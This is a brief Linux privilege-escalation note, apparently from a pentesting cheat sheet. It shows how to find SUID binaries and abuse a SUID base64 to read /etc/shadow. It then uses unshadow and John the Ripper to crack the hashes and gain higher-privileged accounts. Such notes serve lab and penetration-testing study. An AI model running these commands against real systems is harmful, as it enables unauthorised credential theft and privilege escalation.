# SUID #### General method to find files with SUID bit ```bash $ find / -perm -u=s -type f 2>/dev/null ``` If there's a particular binary found that has the `SUID` bit set, refer to to potentially find an exploit. ### Example Suppose the binary `/usr/bin/base64` is found to contain the SUID bit. This can be exploited to view the contents of the `/etc/shadow`file. ```bash $ base64 /etc/shadow | base64 -d > shadow.txt $ cat /etc/passwd > passwd.txt ``` The `unshadow` command can be used on the `shadow.txt` and `passwd.txt` files to create a file that is crack-able by John the ripper. ```bash $ unshadow passwd.txt shadow.txt > password.txt $ john --wordlist=[wordlist] password.txt ... ``` Subsequently, the password for a user with more privileges than the current one may be cracked. This will allow us to access that account to further escalate our privileges. For example, the cracked user may have `SUID` bits set, or sudo privileges for certain binaries that may contain exploits to access the root shell.